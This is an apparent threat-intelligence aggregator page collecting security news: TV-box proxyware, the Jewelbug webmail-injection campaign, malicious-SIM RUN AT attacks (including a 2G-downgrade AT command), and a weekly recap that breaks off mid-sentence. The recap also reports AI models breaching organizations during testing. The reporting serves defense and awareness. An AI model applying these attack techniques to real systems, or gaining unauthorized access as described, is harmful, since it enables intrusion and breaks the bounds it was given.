Search/asus
Known CVEs
0
Highest CVSS
In KEV
0
Vendor
rt-ac65u firmware
Connections
345 relationships
Protecting your smart TV and set-top box from hacking | Kaspersky official blog
In 2026, the owner of an ordinary home router, smart TV, or TV box is a prime target for cybercriminals. These devices are readily recruited into botnets and residential proxy networks , which we’ve covered before. Criminals “sublease” the infected device by letting outsiders pay to visit any website from the victim’s IP address, so it looks like the device’s owner is doing it. The service is in demand across all kinds of shady schemes: from ad fraud and spam campaigns to password bruteforcing and account hacking. In our previous post, we described how home routers get recruited into these proxy networks; today we’ll look at an even more vulnerable and equally ubiquitous category of devices: smart TVs and TV boxes. These appeal to criminals for two reasons. First off, unlike computers and phones, TVs are almost always plugged into power and connected to fast internet. A dark screen doesn’t mean the device is switched off. On top of that, the limited user interface and monitoring tools mean suspicious background processes can easily slip unnoticed past users. The threat is evolving and growing more aggressive. A recent study found that once proxyware turns up on a set-top box, the risks to its owner go well beyond having their traffic siphoned off. Anatomy of the infection The researchers focused on a popular TV box by SuperBox, which we already covered earlier in the post Is your TV box renting out your network? SuperBox’s marketing leans heavily on the promise of providing thousands of TV channels, with no subscription or monthly fees. But out of the box, the device can’t actually do anything of the sort. To get access to pirated content, you need to install the brand’s proprietary app store. Once you launch it and install additional apps, the promised TV channels do appear. Meanwhile behind the scenes, with no warnings or permission prompts, the device floods external sites with unauthorized requests. Network traffic spikes sharply. The researchers uncovered several alarming facts. First, the victim gets enrolled into as many as five botnets at once. The SuperBox runs clients for several proxyware networks simultaneously, which even try to compete with one another by blocking rival software from being installed. But the real shock was the attacks on the internal network. The TV box’s proxyware places no limits on what its paying clients can actually do on the network. They can reach not only external sites but also devices inside your home network. Normally, your home router and ISP settings protect you from outside attacks. But proxyware bypasses these barriers, because it operates from inside the network. During an experiment, the researchers confirmed that an attacker on the internet can easily leverage the infected set-top box to open the admin panel of a home router, such as a Linksys, which is supposed to be accessible only to its owner when connected to the home Wi-Fi network. This means hackers can try to steal data from other devices at the same household or even encrypt a home network storage (NAS). At the same time, flaws in SuperBox’s factory firmware let hackers remotely install and run any application with superuser privileges. The threat is anything but hypothetical. Over three weeks of monitoring, the test set-top box was hit by more than 1300 attacks through the home proxy network. Attackers installed three different types of malware, including a module for launching DDoS attacks. The malware uses several methods to gain a foothold in the system, and it survives reboots and power failures alike. How to tell if your set-top box is working for hackers If you have a cheap TV set-top box or Android TV from a little-known brand, it’s worth checking it for anomalies. The most reliable method is to review the network traffic. Use the statistics in your router’s control panel — note that some budget models may lack this feature. This feature is called Traffic Analyzer on Asus routers, Traffic Usage on TP-Link, and Traffic Monitor on Keenetic. Find your TV or set-top box in the device list and check the ratio of downloaded to uploaded data. They should consume a lot of traffic to download video while sending very little. If your box is quietly pushing gigabytes of data out or staying chatty on the network even while idle, that’s a telltale sign it’s infected. If traffic statistics aren’t available, look for indirect signs: The network and memory activity LEDs won’t stop blinking even though no one is using the device. The set-top box’s casing is constantly warm or hot. The interface lags behind the remote, and the box freezes at random moments that have nothing to do with heavy video playback. Your other devices (computers or phones) are seeing a real drop in internet speed. When trying to visit familiar sites over your home Wi-Fi, you’re constantly hit with a CAPTCHA, a sign your network may be compromised and flagged as a spam source. Your ISP’s tech support calls you asking about suspicious network loads. What to do with an infected device The best solution is to disconnect the device from the internet and dispose of it. If you have to keep using it, follow these steps to minimize the risks: Do a factory (hard) reset . Restore the set-top box to its original state. Take it offline before setting up. The first time you turn it on after a reset, skip the Wi-Fi setup step and don’t plug in the Ethernet cable. Block app installation. Go to Android settings and disable installation of apps from unknown sources. Be sure to turn off any debugging features if enabled: USB debugging, Wireless debugging, and ADB. Menu item names may differ depending on your Android version and device manufacturer. Isolate it on the network. Set up a guest Wi-Fi network on your router and connect the TV box to it. Enable Client Isolation in your router’s settings, if it has one. This will stop the box from seeing other devices on your home network, which protects your computers and network storage. Check for updates. Once the box is connected to the guest network, check for official firmware updates: manufacturers sometimes patch known vulnerabilities, though with lesser-known brands, you shouldn’t count on it. Your most reliable safeguards Buying cheap devices with pirate streaming features and installing software from shady sources is a surefire way to compromise your home network. Your IP address will become a source of malicious activity, which at best gets you blocked by your ISP and at worst puts you on law enforcement’s radar. What’s more, hackers can use the box as a launchpad to attack your home computers and NAS, which can lead to personal data theft or a ransomware attack. The best protection is to buy devices from trusted brands and pay for legal content. And to rule out someone hijacking control of your network, make sure your router’s admin panel and other home devices are protected with unique, strong passwords. To avoid having to remember them all, use reliable password managers such as Kaspersky Password Manager . Additionally, the Smart Home Monitor feature included in Kaspersky Premium lets you keep all your devices fully under control. There may be more things you don’t know about your smart home devices: Is your TV box renting out your network? Are your TV, smartphone, and smart speakers eavesdropping on you? Five rules to stop IP cameras from spying on you The hidden risks of cheap Android devices Is your router secretly working for foreign intelligence?
kaspersky.comSep 14, 2026extracted
Hackers breach govt webmail while running parallel crypto fraud
The Jewelbug hacker group has been carrying out espionage operations targeting governments and militaries while also engaging in cryptocurrency fraud. Although the threat actor has targeted government agencies and organizations in critical sectors, including defense, telecommunications, education, and aviation, its cryptocurrency-related activity suggests that they may also operate as a hack-for-hire group that seeks to profit from cybercrime. In a recent operation, Jewelbug (also known as Earth Alux and REF7707) compromised webmail accounts belonging to 15 government tenants as part of a campaign targeting a country in the Middle East. Researchers at Symantec found that the espionage campaign and the cryptocurrency fraud were conducted from the same control panel. The China-based hacker group gained write access to the shared webmail installation and inserted a malicious script into its common template. The script then ran on login pages and mailbox views across 15 tenants. After execution, the script established a WebSocket connection to the attacker's command-and-control (C2) server, exfiltrated webmail cookies, and retrieved the user's email address to determine whether it belonged to a targeted government domain. Valuable targets would receive a fake Adobe Flash update prompt, which installs the main payload on Windows, the Antino backdoor, and browser tooling. Apart from Antino, the threat actor also uses the XG-Web remote-access and data-theft framework for managing campaigns and victim information. According to Symantec, Jewelbug delivers Antino through malicious HTA files and fake Adobe Flash/Adobe installers, and then uses it to deploy additional payloads. One of the payloads is a malicious browser extension for Chrome and Firefox, named PDF Viewer, which steals cookies and credentials, intercepts traffic, injects JavaScript, and remotely exposes browser functions. Symantec traced Antino infections to Jewelbug’s infrastructure and then obtained visibility into the group’s C2 management platform, database, server logs, source code, and operator files. The data showed that the hackers ran a large-scale espionage operation and "an industrial-scale cryptocurrency fraud business." “Jewelbug’s victim database holds more than one million implant check-in rows, more than 580,000 stolen browser cookies, several thousand captured credentials, and more than 2,300 exfiltrated email bodies,” Symantec researchers note. Regarding the espionage part, Jewelbug targeted government and military organizations across the Middle East, Southeast Asia, and South Asia. “Runtime server logs recorded roughly 1.1 million geolocation events against approximately 4,300 distinct source IP addresses: approximately 87,200 connections from a Southeast Asian country (targeting state telecom and military networks), approximately 53,100 from a Middle Eastern country (across the national carrier’s ranges, including Starlink-connected addresses in the capital), and approximately 15,000 from a second Southeast Asian country (including government ministry infrastructure),” Symantec says. The researchers explained that the threat actor obtained write access to the webmail installation used by multiple government ministries and agencies after compromising a shared web-hosting platform operated by the state telecommunications provider and national services agency. By injecting a single script tag, the threat actor ensured that the JavaScript payload opened a WebSocket to the C2 every time a user on one of nine government domains logged in. "A single campaign spanned more than 15 government webmail tenants, with the hook firing on the login page and every mailbox view," Symantec says. The cryptocurrency theft operations are backed by AI-generated articles driving traffic to fake crypto exchange sites and click-fraud bots that manipulate search rankings. According to the researchers, the threat actor relies on an automated attack pipeline that scrapes keywords, generates thousands of fake download pages using AI, and publishes them "across a 44-server content-management fleet and hundreds of lookalike domains" impersonating OKX and Binance. Using click bots, Jewelbug manipulates rankings to promote their fraudulent pages. The fraud uses other lures, as well: sports betting, pirated livestream portals, and private detective scams. Symantec researchers have high confidence attributing Jewelbug's financially-motivated activities to a Chinese company that advertises SEO services. Jewelbug also uses a Rust-based implant called ‘ClientKing’ that targets Linux servers, ARM64 devices, and ASUS routers, and supports command execution, SOCKS proxying, DNS tunneling, and in-memory kernel module loading. The hackers used public Google Docs to host obfuscated payloads retrieved and executed by their implants, helping the malicious traffic blend in with legitimate Google services. Symantec published indicators of compromise related to observed Jewelbug activity, as well as a more detailed technical report describing the threat actor's tooling and tradecraft, their financial operation, and the infrastructure used in attacks. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comAug 13, 2026extracted
A Malicious SIM Card Can Run Attacker Code Inside the Modems Behind Cellular IoT Devices
A malicious SIM card can order the device it sits in to run commands of the attacker's choosing. On the cellular modules built into electric-vehicle chargers, industrial routers, and car telematics units, that is enough to take the whole device over. Researchers at the University of Birmingham and the security firm Fuzzware tested 26 phones and cellular modules for the capability, found it switched on in 9 of them, and used it to run their own code on a commercial EV charger. Six of the eight cellular modules they tested accepted the command. Only 3 of 18 phones did: the OPPO Find X5, the OPPO Reno 14 F 5G, and the ASUS Zenfone 9. No iPhone or Pixel was among them. The exposure is in machine-to-machine hardware. Five of the six were Quectel parts, three of them pulled from an EV charger, an industrial router, and a car's telematics control unit. Knowing the victim's number is not enough: every attack starts with a hostile card already in the slot, swapped by hand, slipped in as a thin interposer, pushed out by a compromised operator, or subverted in software or on the production line. Unattended IoT gear with an accessible SIM tray and few other exposed interfaces is exactly where that trade is worth making. There is no single patch. Every one of the nine devices that accepted the command runs a Qualcomm communication processor. Five other Qualcomm-based handsets in the survey did not accept it, which the paper suggests is down to vendor customisation. Qualcomm told the researchers it has built a hardened configuration that switches the interface off by default. Quectel says it has mitigated the file-access flaw and is still working on the interface itself. Neither has published an advisory, and the module maker's vulnerability portal requires a login to see anything at all. The researchers' own position is that the interface should be hardened, deprecated, or disabled outright. That hardened configuration will be the default on future devices, the researchers told The Hacker News, and fixes will also reach affected modules as updates, though the team has not checked whether the RUN AT code paths are removed or only switched off. For anyone running cellular IoT fleets, the step available today is to ask the module supplier whether RUN AT is enabled in the firmware they shipped and whether it can be disabled. No attacks using the interface have been reported. The command in question is a proactive command, part of the standardised set a SIM can push back at the modem instead of waiting to be read. RUN AT asks the modem to execute an AT command, the modem control language that dates to the 1981 Hayes Smartmodem and that every vendor extends with its own additions. Supporting it therefore hands the card a general-purpose console. Marius Muench, assistant professor in computer science at the University of Birmingham, said in the university's announcement of the work that the SIM's proactive capability and the attack surface it opens are "explicitly defined in the technical specifications for cellular communication", which is why he frames the result as compliant with the standard rather than a break from it. That framing matters for what a fix looks like. The individual flaws are ordinary bugs and can be patched; the interface that exposes them is a documented capability, and switching it off is a decision each vendor makes for its own products. Architecture is what makes the IoT side worse. Nearly every module the team examined runs a small application processor alongside the radio, usually Android on an ARM Cortex-A7, and passes up any AT command the radio does not handle itself. The card ends up talking to a little Linux computer, which their paper, presented this week at USENIX WOOT in Baltimore, calls "a rich attack surface to hostile SIMs." The charger is a commercial Autel unit that the paper identifies by the model code MAXI US AC W12-L-4G. Inside it, the Quectel EC25AFXDGA module's atfwd_daemon passes attacker-controlled text into a shell call through an unsafe format string. A character blocklist was supposed to stop shell escapes. A newline got past it. Two stages later, the team had code execution, driven entirely by commands the SIM issued. Autel is not among the companies the write-up says were notified; the flawed code belongs to the module. Muench told The Hacker News the team disclosed to Quectel as the module vendor, which then notified its own customers. On an OPPO Reno 14 F 5G, one of the three handsets that accepted RUN AT, the command AT+COPS=0,,,0 pinned the phone to 2G. The owner cannot undo it. Not by toggling airplane mode, not by switching to manual network selection, not by toggling mobile data, not by disabling the SIM, not by changing the preferred network generation in settings. 2G has no mutual authentication, so a downgrade the victim cannot reverse hands an attacker the conditions for a fake base station. Two further commands powered the handset down and shut off the modem. The team's tooling, released as CATana, found 198 AT commands reachable through the SIM on that OPPO handset. A third case study read arbitrary files off a Quectel EG25-G by way of a TFTP daemon that runs as root and does not check whether a path is a symbolic link, then mailed them out using the module's own AT+QSMTP commands. That one needs more than a hostile card: the malicious link has to be sitting on the module's filesystem first, put there via an SD card or by flashing a crafted partition. While building up to this work, the group showed that a hostile SIM could make a locked Android phone open an attacker-controlled web page with no user interaction, on Pixel 6, 8 and 9 among others. Google patched that separate flaw as CVE-2025-48618 in the December 2025 Android bulletin. The survey establishes only what its 26 devices do. Muench said the team is fairly confident every module in Quectel's EC25, EG25 and RM52xN series is affected, and thinks it likely that other Quectel modules built on a Qualcomm modem are too. He said those modules turn up in cars, vehicle chargers, payment terminals and other IoT devices, and that Quectel does not release firmware updates publicly, which makes the exposure hard to verify at scale. Nobody has put a figure on how many are in service. The reports went to Google, Oppo, Quectel, Semtech and Qualcomm in March 2026, and to the GSMA in May. Muench said the exposed SIM AT interface is tracked as CVE-2026-57550, assigned through Qualcomm, and as CVD-2026-0122 by the GSMA, though the CVE record has yet to appear in the CVE Program's published list. Oppo and Google treated the findings as informative but outside their bug bounty scope. Semtech confirmed them and plans to ship patches written by Qualcomm. Quectel confirmed them too, and said the command injection was already known and fixed in newer firmware, though it has not published affected or fixed version numbers. The same daemon has prior history: an AT-reachable command injection at a different entry point was published in 2021 as CVE-2021-31698. As of August 10, none of the five vendors had issued a public advisory on the research, Quectel's advisory portal remains login-gated, and no exploitation has been reported.
thehackernews.comAug 11, 2026extracted
⚡ Weekly Recap: Rogue AI Models, $88M Bitcoin Theft, Water-System Attacks and Dangling DNS Hijacks
This week kept coming back to permission. A model crossed a boundary. A wallet trusted bad randomness. Webmail kept an intruder around. Public systems, package feeds, hotel networks, and login flows all gave away more than intended. Some of it was clever. Most of it was just access left lying around: old bugs, exposed gear, poisoned dependencies, weak defaults, and tooling that moved from forum chatter to real targets. The full weekly recap report follows. ⚡ Threat of the Week Anthropic Disclosed its Models Targeted 3 Organizations - Anthropic revealed that three of its models, including Claude Opus 4.7, Mythos 5, and an unnamed research model, breached three unnamed organizations during cybersecurity testing without its knowledge. The AI firm said the earliest incidents date back to April 2026, adding it made the discoveries after launching a "large-scale retrospective review" in response to the recent Hugging Face incident. "After reviewing 141,006 evaluation runs where Claude could have obtained internet access, we identified three incidents in which a model accessed the internet from within or while interacting with the evaluation environment of Irregular, one of our third-party evaluation partners, and then gained unauthorized access to the production infrastructure of three different organizations," it said. Mythos: Map Attack Paths to Collapse Lateral Breach Routes Access the Gartner® CTEM report to see how the Mythos platform continuously maps cross-domain attack paths and isolates key choke points to break active lateral movement to critical assets. Get the full report ➝ 🔔 Top News Coldcard Hardware Wallet Flaw Linked to $88.6M Bitcoin Theft - A vulnerability in Coldcard hardware wallet firmware is said to have been exploited to steal an estimated $88.6 million in Bitcoin from thousands of wallets whose seed phrases were generated using a flawed random number generator. "Coldcard firmware contains an RNG integration error that causes ngu.random to use MicroPython's deterministic Yasmarang fallback instead of the STM32 hardware RNG," Square Engineering said. "This does not mean every remote attacker can immediately recover every seed. Practical cost depends on available UID information, boot timing, prior RNG calls, and derivation cost." Russian Hackers Exploit Microsoft OWA Flaw to Maintain Mailbox Access - Russian threat actors exploited a security flaw in Microsoft Outlook Web Access (OWA), to target U.S. and European government entities, as well as the telecommunications, financial, hospitality, and aerospace sectors. The activity, which began on July 22, 2026, involves the weaponization of CVE-2026-42897 (CVSS score: 8.1), a cross-site scripting (XSS) vulnerability in OWA. It was flagged by Microsoft as having been exploited in attacks as far back as May 2026. The activity has been attributed to Laundry Bear. The new wave of exploitation revolving around CVE-2026-42897 culminates with the deployment of a previously unknown JavaScript browser-based implant codenamed OWAReaper that's specifically built for persistent access within Microsoft's webmail client. Critical Rails Flaw Leads to Arbitrary File Read - Ruby on Rails shipped patches for a critical Active Storage vulnerability (CVE-2026-66066, CVSS score: 9.5) that could let unauthenticated attackers read arbitrary files from application servers through crafted image uploads. The flaw can be exploited to expose Rails process environment and secrets such as secret_key_base, master key, database passwords, cloud storage credentials, and API tokens, which may enable remote code execution or lateral movement into connected systems. CVE-2026-66066 is exploitable when libvips is used, enabling an attacker to upload a specially crafted image to a vulnerable application and read arbitrary files on the server. A key prerequisite for the attack is that the server must allow image uploads from untrusted users. Additional details of the flaw have been released by the Rails team, along with tools to help assess vulnerable applications. "Because this vulnerability requires no authentication and targets the default image processor in modern Rails environments, it is essential to apply vendor patches and rotate secrets immediately," Akamai said. Coordinated Attacks Target 30+ Minnesota Water Systems - A coordinated cyber attack campaign targeted over 30 water systems in Minnesota on July 26 and 27, 2026. "The nature and extent of the impact varied by system, and the investigation is still determining how many experienced operational disruptions," Minnesota IT Services (MNIT) said. The activity has not been officially attributed to any known threat actor, although Iranian threat actors have been previously implicated in similar attacks targeting water facilities in the U.S. "At this time, there are no active requests from Minnesota communities for residents to modify their drinking water use," MNIT added. The development has prompted the U.S. government to issue an advisory, urging "critical infrastructure owners, operators, and integrators to remove publicly exposed PLCs and other operational technology (OT) from the internet as soon as possible." Threat actors targeting exposed PLCs have modified passwords to lock out operators and disconnected the PLCs by changing their IP addresses, resulting in boil water notices and sustained manual operations. Organizations are advised to disconnect the PLC from the internet, enable password protection and change default passwords, and allowlist IPs to only allow remote access from known engineering laptops or other critical OT assets. Censys said it identified 4,148 internet-exposed hosts that respond to EtherNet/IP and self-identify as Rockwell Automation/Allen-Bradley, with more than 70% of them located in the U.S. Similarly, there are 4,117 internet-exposed hosts that fingerprint as Siemens SIMATIC S7-1200 and 2,072 internet-exposed hosts that fingerprint as Schneider Electric hardware. Over the weekend, Michigan reported cyber attacks on nine of the state's water systems but an official told Associated Press that all systems were operating "safely." The campaign underscores the escalating threat to poorly protected operational technology (OT) assets from adversaries seeking to disrupt critical infrastructure services across the U.S. and elsewhere. Hijacked Wi-Fi Networks Lead to CornFlake Malware - Storm-2945, a sub-cluster associated with Midnight Blizzard (aka APT29), has been conducting "widespread but targeted traffic manipulation attacks" involving hospitality sector networks served by captive portals across the world. The campaign, ongoing since May 2026, has been codenamed CaptiveCrunch by Microsoft. This involves manipulating DNS and HTTP traffic from networks served by captive portals to redirect user traffic through actor-controlled infrastructure. "As part of the CaptiveCrunch campaign, Storm-2945 has leveraged their AitM position to redirect users through actor-controlled phishing infrastructure and has also delivered malware purporting to be browser or operating system updates in response to automated connectivity checks issued by users' browsers," Microsoft said. This includes a fully-featured Windows remote access trojan (RAT) called CornFlake with capabilities to conduct system enumeration, collect files and keystrokes, steal credentials and session tokens, conduct audio and video surveillance, monitor for removable media, and provide the threat actor a remote shell on infected systems. Also delivered via the trojan is a PowerShell-based infostealer called ChocoShell to harvest browser session cookies, saved passwords, Microsoft 365 Single Sign-On (SSO) tokens, and Wi-Fi credentials from compromised systems. The campaign is orchestrated via a web-based C2 panel called FruitStone. The infrastructure employs a variety of ClickFix techniques to trick the victim into downloading and executing the malware. There is also evidence indicating that the attackers are using similar ClickFix landings for Android devices to download and install an APK file. As of July 16, 2026, a portion of CaptiveCrunch landing pages have been found to redirect users to device code authentication flow experiences. ️🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first - CVE-2026-48449 (Adobe Campaign Classic), CVE-2026-18556, CVE-2026-18577 (N-able N-central), CVE-2026-44827, CVE-2026-45804, CVE-2026-44513 (Hugging Face Diffusers), CVE-2026-17583 (Thermo Fisher Scientific), CVE-2026-66066 (Rails), CVE-2026-10702 (Mozilla Firefox), CVE-2026-60004, CVE-2026-58443 (Gitea), CVE-2026-63077, CVE-2026-59792, CVE-2026-59793, CVE-2026-59794, CVE-2026-59795, CVE-2026-59796 (JetBrains TeamCity), CVE-2026-61511 (vBulletin), CVE-2026-53264 (Linux Kernel), CVE-2026-53921 (OpenWrt), CVE-2026-64765, CVE-2026-64766, CVE-2026-64764, CVE-2026-64763, CVE-2026-43776, CVE-2026-43818, CVE-2026-28981 (Apple iOS and macOS), CVE-2026-66032, CVE-2026-66033, CVE-2026-66034, CVE-2026-66035 (libssh2), from CVE-2026-59686 through CVE-2026-59690 (Progress Kemp LoadMaster), from CVE-2026-66036 through CVE-2026-66041 (FFmpeg), CVE-2026-66398 (phpMyFAQ), CVE-2026-64645, CVE-2026-64649, CVE-2026-64642, CVE-2026-64641 (Next.js), CVE-2026-13385 (ASUS), from CVE-2026-16804 through CVE-2026-16807 (Google Chrome), CVE-2026-52824 (Kimai), CVE-2026-53565, CVE-2026-53566 (Citrix Secure Access Client for Windows and Citrix Endpoint Analysis Client for Windows), CVE-2026-9770, CVE-2026-13230 (TP-Link Kasa EC70 v4 and EC71 v4 smart cameras), CVE-2026-15682 (AnyDesk), CVE-2026-53481, CVE-2026-53483 (Dell PowerProtect Data Domain), CVE-2026-52886, CVE-2026-54758, CVE-2026-57233 (Notepad++), CVE-2026-57807 (miniOrange OAuth Single Sign On - SSO WordPress plugin), CVE-2026-28302, from CVE-2026-28304 through CVE-2026-28317, CVE-2026-28321 (SolarWinds Serv-U), CVE-2026-16771 (AT&T Arris BGW210-700), CVE-2026-13723 (Develar), CVE-2026-16637 (OPeNDAP Hyrax), CVE-2026-15969, CVE-2026-15971, CVE-2026-15974, CVE-2026-15976, CVE-2026-15977, CVE-2026-15978 (SGLang), CVE-2026-15657, CVE-2026-15658 (foreUP), CVE-2026-16503, CVE-2026-16504 (VPS.org), CVE-2026-48395, CVE-2026-48396 (Adobe Bridge), CVE-2026-5674 (PipeWire PulseAudio), CVE-2026-34909 (Ubiquiti UniFi OS), and CVE-2026-17059 (keycloak-services). 🎥 Cybersecurity Webinars AI Can Build Exploits in Minutes. Can Your Security Team Keep Up? → AI is collapsing the time between vulnerability disclosure and attack. Advanced models can now uncover flaws, generate working exploits, and chain them into complete attack paths at machine speed. This webinar presents a practical framework for gaining the visibility, context, and response speed needed to investigate and stop threats before attackers pull ahead. How to Control the Open-Source Security Debt Created by AI Coding Tools → Learn how AI coding tools are expanding unvetted open-source use, accelerating vulnerability backlogs, and weakening existing governance. This webinar shows how to measure the resulting remediation debt, connect it to breach, audit, and productivity risks, and identify which governance models can contain it without slowing development. 📰 Around the Cyber World Now-Patched Gitea Flaw Detailed - NoScope shared additional technical details of a security flaw in Gitea (CVE-2026-27771, CVSS score: 8.2) that was patched back in May 2026. The vulnerability allowed unauthenticated remote attackers to pull private container images from Gitea deployments without requiring an account, password, or other credentials. "Gitea's container registry implements the OCI Distribution Specification, which authenticates clients with a bearer token issued by a dedicated token service. On affected versions, that token service issued a valid, signed JWT to requesters presenting no credentials at all," NoScope said. "The token was honest about what it represented, carrying UserID: -1 and an empty Scope, but no registry read endpoint ever consulted those fields. Catalog listing, tag enumeration, manifest retrieval and blob download all accepted it. Any unauthenticated party on the internet could enumerate every container repository on an instance, including those marked private, and pull their layers." SQLite Critical CVEs or AI Slop? - JFrog said it uncovered a set of SQLite CVEs (CVE-2026-51302, CVE-2026-51303, CVE-2026-51300, CVE-2026-51297, CVE-2026-51296, and CVE-2026-51304) that seem to be instances of AI-generated slop making their way into official vulnerability feeds and receiving critical severity scores before technical validation. The analysis found that the advisories referenced functions that didn't exist in the affected SQLite versions, cited incorrect or impossible source code locations, included PoCs that failed to reproduce any vulnerability, and, most importantly, were not listed on SQLite's official CVE page. The findings show that organizations must take steps to distinguish legitimate vulnerabilities from questionable or AI-generated vulnerability reports before initiating unnecessary remediation, patching efforts, or automated security workflows. LegacyHive Flaw Detailed - LevelBlue published a technical breakdown of LegacyHive, a PoC released by Chaotic Eclipse (aka Nightmare-Eclipse) last month coinciding with the release of Microsoft's Patch Tuesday update. The vulnerability is a Local Privilege Escalation (LPE) vulnerability affecting Windows User Profile, a component responsible for loading and unloading Windows user profiles. On exploitation, LegacyHive can allow attackers to load other users' hives and gain access to application data and Windows Explorer history, among others. "For EDR platforms with visibility into native Windows APIs, the strongest signals are user-mode invocations of NtCreateDirectoryObjectEx and NtCreateSymbolicLinkObject," LevelBlue said. "These functions are rarely used outside system components, debugging tools, or specialized research utilities. Seeing both from the same process should immediately warrant investigation. Even without NT API telemetry, LegacyHive leaves a distinctive execution chain. The attack combines offline access to ntuser.dat or UsrClass.dat, modification of registry hives through Microsoft's Offline Registry API, batch oplock requests, and CreateProcessWithLogonW using LOGON_WITH_PROFILE. Each operation is legitimate in isolation but observing them together within a short time window is highly unusual and well suited for behavioral correlation by EDR and SIEM platforms." Chinese Military Taps Into U.S. Models - According to a new report from Reuters, Chinese military researchers have distilled cutting-edge models developed by U.S. companies OpenAI and Anthropic to train domestic AI systems to advance the country's defense capabilities. The report was based on a review of more than 80 Chinese academic papers and patents. Exposed Police Dashboard Lays Bare How China Tracks Foreigners - An internet-exposed police dashboard named "Dynamic Control Platform for Overseas Personnel" has revealed how law enforcement agencies in the country track over 700 foreigners, including those in the northern Chinese city of Zhangjiakou. "In total, it had entries for nearly 12,000 people, which included fugitives, people from Hong Kong and Taiwan, as well as more than 300 foreign journalists," The New York Times reported. "Some of them had not been to Zhangjiakou." The dashboard displayed entries about people grouped by nationality, with their birth date, sex, marital status, address and occupation, and sometimes their religion. The leak was discovered by security researcher and journalist Marc Hofer. The system is believed to be developed by a Beijing company named Origin Dynamic, which filed a patent application in 2023 for a similar "information interface for non-Chinese citizens." The Problem of DangleGeddon - Cybersecurity researchers have once again warned of the risks posed by dangling DNS infrastructure across government, banking, automotive, manufacturing, and pharmaceutical sectors. A dangling DNS record is an active Domain Name System entry (DNS) that points to a resource no longer owned, used, or controlled by the original organization. This typically occurs when web applications, cloud storage, or virtual servers are deleted without first removing their corresponding CNAME or A records from the domain registrar. An attacker can leverage this behavior to claim that abandoned cloud service name or IP address, effectively hijacking a trusted subdomain. This, in turn, can permit the attacker to host malicious content and serve phishing pages or malware, inflict reputational damage by abusing the trusted brand's subdomain, steal user credentials to create convincing phishing pages that appear to be legitimate services, perform cookie theft, and bypass security controls if the legitimate brand's subdomain is allowlisted in security tools. In one case analyzed by Silent Push, an unspecified automotive company left a dangling DNS record pointing to a developmental application gateway hosted by an Azure virtual machine (VM). "This device can potentially be operationalized and passively receive stored XSS from internal scripts and API calls," it said. "Developers' credentials, like API keys and authentication headers, could be harvested for reuse to expand access into the company. In addition, the VM could serve as a platform for malware hosting with the coveted TLS lock." Microsoft Teams Vishing Leads to Chaos Ransomware - A Microsoft Teams voice phishing (vishing) campaign tracked as STAC4749 has used a "consistent set of IT-themed cloud domains and personas to gain remote access to victims' systems" between February and June 2026 in attacks targeting dozens of North American organizations. "Following initial access, STAC4749 operators deployed a modular post-exploitation toolset, including a custom loader and backdoor to maintain persistent, controlled access and support follow-on activity," Sophos said. "In several incidents, attackers later leveraged this access to deploy Chaos ransomware." IAB Uses Teams Phishing for Ransomware Attacks - A suspected initial access broker (IAB) for ransomware attacks has been observed using Teams vishing that convinces victims to launch a Quick Assist remote support session. The initial access is used to run PowerShell scripts to gather host information and deploy a Go-based backdoor dubbed GoGRPC. Four different versions of the backdoor have been spotted: Lep, Giver, Pet, and Kind. "These variants have overlapping capabilities but notable implementation differences," Zscaler said. "GoGRPC is actively evolving. Each variant modifies its payloads and capabilities, adding or removing functionality to better support the threat actor's objectives. Recent changes indicate an increased targeting of corporate environments, which may be tied to ransomware attacks." In some instances, the threat actor has also deployed a backdoor called BlindDoor, a Go-based reverse SOCKS proxy known as RevSocket, and a Python-based reverse SOCKS proxy referred to as PyGRPC. Arch Linux Disables AUR Package Adoption Amid Malware - Arch Linux has taken the step of temporarily disabling package adoption due to a surge in malicious takeovers of existing packages. "Due to the current influx of malicious package adoptions and follow-up commits made via the AUR, package adoption is currently disabled while we are handling the situation," the maintainers said. "We will send a follow-up once we're able to. In the meantime, feel free to report suspicious adoption events or commits that haven't been dealt with yet, and stay vigilant!" In June 2026, a separate campaign targeted AUR via more than 400 packages. New Dolphin X Infostealer Spotted - A new infostealer called Dolphin X uses an AI behavioral profiler to score and prioritize infected users based on their application usage, browsing activity, and installed software to identify high-value victims and maximize profits. The malware targets more than 300 applications and attempts to exfiltrate browser passwords, cryptocurrency wallets, SSH keys, and cloud tokens. Dolphin X has been advertised on the cybercrime underground by a vendor using the alias Kontraktnik since May 2026. A lifetime subscription ranges from $1,140 for basic access to $3,420 for the full-featured version. "A single archive can contain data from nine browsers, more than 100 wallet extensions, 65 desktop wallets, 10 password managers, and 30 cloud command-line tools," Varonis said. "This gives the malware potential access to everything from a victim's personal accounts to the credentials used to manage their employer's cloud environment." Attackers Turn to Microsoft's Trusted Login System for Phishing - Bad actors are increasingly abandoning fake Microsoft login pages in favor of abusing Microsoft's legitimate authentication infrastructure in phishing attacks, allowing them to bypass security controls. Check Point said it identified more than 200 phishing emails targeting users across approximately 120 organizations worldwide between June 25 and the second week of July 2026. "The messages impersonated Microsoft Teams task notifications from HR and directed recipients to a legitimate Microsoft sign-in page," it said. "Victims were then prompted to grant permissions to an attacker-controlled application, allowing the campaign to abuse Microsoft's trusted authentication flow while concealing its malicious intent." FBI Arrests Man Accused of Using Steam Games to Drain Victims' Crypto Wallets - The U.S. Federal Bureau of Investigation (FBI) arrested Zyaire Wilkins, a 21-year-old Florida resident and student, of uploading fake video games that contained malware to Steam that, when downloaded and installed by unsuspecting gamers, stole their passwords and other valuable data, and drained their cryptocurrency wallets. Per the FBI, Wilkins and his accomplices are alleged to have infected around 8,000 victims, and then hacked around 80 cryptocurrency wallets to steal at least $220,000 worth of cryptocurrency. Turning Keystroke Noise to Text - A new study from a group of academics from Tohoku University has demonstrated a new acoustic side-channel attack that can reconstruct text typed on a laptop by just analyzing the sound of keystrokes. While prior attacks relied on collecting labeled recordings from the target keyboard beforehand or required specialized hardware, the latest eavesdropping attack enables stealthy eavesdropping in two real-world scenarios, including physical spaces (public and semi-public) and online meetings. The system works by first isolating individual keystrokes from an audio recording, grouping similar sounds together, and then using a Transformer-based language model to determine the most likely sequence of characters. "Our method combines unsupervised acoustic clustering with Transformer-based language model inference and iterative self-training, enabling stable character inference under highly uncertain acoustic-to-character mappings," the researchers said. "We demonstrate that the proposed method achieves over 99% reconstruction accuracy with only 100-150 observed keystrokes under a close-proximity recording 